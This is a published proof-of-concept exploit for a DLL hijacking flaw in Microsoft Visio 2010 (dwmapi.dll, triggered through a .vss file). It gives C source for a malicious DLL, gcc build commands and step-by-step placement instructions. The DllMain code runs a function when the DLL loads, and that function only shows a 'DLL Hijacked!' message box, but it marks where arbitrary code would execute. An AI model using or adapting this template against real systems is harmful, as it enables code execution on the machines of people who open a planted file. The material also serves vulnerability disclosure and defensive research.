Microsoft Visio 2010 version 14.0.4514.1004 DLL hijacking exploit that leverages dwmapi.dll.
bdb7d13202331bb5aabd38cb4f7383d7f668e1acdf056a72ecb54dd2958a747a
/*
Microsoft Visio 2010 v14.0.4514.1004 (dwmapi.dll) DLL Hijacking Exploit
Vendor: Microsoft Corp.
Product Web Page: http://www.microsoft.com
Affected Version: 14.0.4514.1004 MSO (14.0.4536.1000)
Summary: Microsoft Visio is a diagramming program for Microsoft Windows
that uses vector graphics to create diagrams.
Desc: MS Visio 2010 suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extension is .vss thru dwmapi.dll library.
----
gcc -shared -o dwmapi.dll msvisio.c
Compile and rename to dwmapi.dll, create a file test.vss and put both
files in same dir and execute.
----
Tested on Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
26.08.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}